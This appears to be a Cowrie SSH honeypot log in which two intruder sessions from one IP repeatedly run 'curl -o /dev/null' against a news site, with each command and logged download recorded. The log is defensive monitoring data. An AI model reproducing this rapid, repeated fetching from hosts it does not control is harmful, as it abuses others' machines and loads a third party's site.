{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.550067Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.607630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.608377Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.610358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.610986Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.638717Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.917145Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.917931Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.920431Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.921055Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.923090Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.926294Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.928270Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.929953Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.932067Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.934822Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.938110Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.940333Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:19.974163Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.974892Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:19.978818Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.037032Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.037847Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.041090Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.043074Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.043855Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.045920Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.095470Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.096199Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.151161Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.151885Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.433414Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.434113Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.436736Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.441005Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.447537Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.450123Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.453595Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.457063Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.482489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.483246Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.486322Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.488691Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.500814Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.501710Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.538762Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.539676Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.577687Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.578537Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.606127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.606929Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.622834Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.623591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.642214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.643020Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.664356Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.665068Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.686563Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.687325Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.703625Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.709927Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.711364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.715153Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.730460Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.733539Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.756469Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.757465Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.759594Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.760454Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.766053Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.809521Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.810471Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.842984Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.843863Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.848449Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.849713Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.880967Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.881922Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.889997Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.890815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.918262Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.919060Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.930944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.931764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.956319Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.957344Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:20.969686Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:20.970448Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
